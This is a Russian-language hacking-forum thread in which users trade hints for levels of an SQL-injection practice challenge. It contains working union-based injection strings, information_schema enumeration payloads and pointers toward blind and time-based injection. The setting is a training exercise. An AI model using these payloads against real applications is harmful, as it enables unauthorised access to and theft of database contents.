HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 27.03.2015, 10:14
billybonse
Познающий
Регистрация: 09.10.2011
Сообщений: 55
Провел на форуме:
12164

Репутация: 1
По умолчанию

Очень интересный челлендж. Завис на 4 уровне.

select * from users where id=2' union select 1,ggg,3 from secret -- or login='$text' limit 1

А дальше как действовать?
 
Ответить с цитированием

  #12  
Старый 27.03.2015, 14:49
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от billybonse  
Очень интересный челлендж. Завис на 4 уровне.
select * from users where id=2' union select 1,ggg,3 from secret -- or login='$text' limit 1
А дальше как действовать?
' union select * from secret where ggg='abc'--

только ппц как условие звучит.." найти ДАННОЕ таблицы"
 
Ответить с цитированием

  #13  
Старый 27.03.2015, 15:03
billybonse
Познающий
Регистрация: 09.10.2011
Сообщений: 55
Провел на форуме:
12164

Репутация: 1
По умолчанию

Цитата:
Сообщение от UXOR  
' union select * from secret where ggg='abc'--
только ппц как условие звучит.." найти
ДАННОЕ
таблицы"
Спасибо. Вот именно условие меня и смутило...
 
Ответить с цитированием

  #14  
Старый 29.03.2015, 15:51
teh
Познающий
Регистрация: 02.12.2010
Сообщений: 79
Провел на форуме:
26437

Репутация: -2
По умолчанию

Как пройти 5 левел вроде делаю правильний запрос, но все равно ошибка

' union select table_name from information_schema.tables where table_name='secret'--
 
Ответить с цитированием

  #15  
Старый 29.03.2015, 16:24
smirk
Участник форума
Регистрация: 08.09.2011
Сообщений: 137
Провел на форуме:
45774

Репутация: 26
По умолчанию

Цитата:
Сообщение от teh  
Как пройти 5 левел вроде делаю правильний запрос, но все равно ошибка
' union select table_name from information_schema.tables where table_name='secret'--
Ну раз ты пошел таким путем, тогда так

'union+select+column_name,2,3+from+information_sch ema.columns+where+table_name='secret'+--+

в итоге: 'union+select+dfgfddfgdfdfdf,dfgdfgfdg,null+from+s ecret+--+

но, можно и проще:'union+select+*,null+from+secret+--+
 
Ответить с цитированием

  #16  
Старый 29.03.2015, 17:07
teh
Познающий
Регистрация: 02.12.2010
Сообщений: 79
Провел на форуме:
26437

Репутация: -2
По умолчанию

Цитата:
Сообщение от smirk  
Ну раз ты пошел таким путем, тогда так
'union+select+column_name,2,3+from+information_sch ema.columns+where+table_name='secret'+--+
в итоге: 'union+select+dfgfddfgdfdfdf,dfgdfgfdg,null+from+s ecret+--+
но, можно и проще:'union+select+*,null+from+secret+--+
почему union select 1,2,3 ? там ж, только 2 поля
 
Ответить с цитированием

  #17  
Старый 29.03.2015, 20:51
teh
Познающий
Регистрация: 02.12.2010
Сообщений: 79
Провел на форуме:
26437

Репутация: -2
По умолчанию

А как 8 левел пройти? Пасс думаю там в числово буквенном виде. А выводиться только то, что произошла какая-то ошибка, или количество выведенных записей. что тогда делать?
 
Ответить с цитированием

  #18  
Старый 29.03.2015, 21:00
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от teh  
А как 8 левел пройти? Пасс думаю там в числово буквенном виде. А выводиться только то, что произошла какая-то ошибка, или количество выведенных записей. что тогда делать?
варианта два. либо true (когда нет ошибки), либо false (есть ошибка). на что похоже?
 
Ответить с цитированием

  #19  
Старый 29.03.2015, 21:12
teh
Познающий
Регистрация: 02.12.2010
Сообщений: 79
Провел на форуме:
26437

Репутация: -2
По умолчанию

на слепую? Но как то пасс узнать
 
Ответить с цитированием

  #20  
Старый 29.03.2015, 23:49
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от psihoz26  
Дошел до 10 и понял что alexbers полный извращенец!!
Этож надо юзеров заставлять blind и time based скули руками крутить!
А кто тебя заставляет руками крутить?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.